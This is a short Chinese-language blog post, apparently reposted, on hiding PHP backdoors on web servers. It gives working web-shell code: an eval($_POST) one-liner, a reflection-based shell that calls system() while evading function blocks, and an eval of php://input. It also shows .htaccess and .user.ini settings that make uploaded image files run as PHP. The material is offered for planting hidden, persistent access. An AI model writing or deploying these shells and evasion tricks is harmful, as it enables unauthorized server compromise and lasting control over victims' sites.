php隐藏后门,php后门隐藏技巧
一句話 and 大馬
phpspy? 菜刀一句話<?php @eval($_POST['cmd']);?>
反射后門
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
調用如x.php?m=system&c=whoami
后門也可繞過某些檢測禁用system函數的防護系統
php:input
php://input是用來接收post數據(這里有php://input的介紹)
@eval(file_get_contents('php://input'))
?>
Post提交 system('whoami');
.htaccess(需webserver支持)
可以設置任意后綴也可以設置UTF7編碼格式shell
AddType??application/x-httpd-php???? .jpg
然后再傳一個JPG結尾的shell,訪問即可執行了
.user.ini(需fastcgi配合)
動態修改php.ini配置文件
User.ini
auto_prepend_file:指定在每個PHP頁面執行前所要執行的代碼
auto_prepend_file=demo.gif (每個頁面都會加載demo.gif)
使用php://input (不需要上傳額外的文件)(需要自行打開allow_url_include=on 默認為off)
缺點:不支持.user.ini修改allow_url_include (在PHP5時是PHP_INI_SYSTEM。 從PHP5.2.0起可用。)
http://php.net/manual/zh/ini.list.php
http://php.net/manual/zh/configuration.changes.modes.php
總結
以上是生活随笔為你收集整理的php隐藏后门,php后门隐藏技巧的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 使用python编程语言编写程序:输入a
- 下一篇: Reds笔记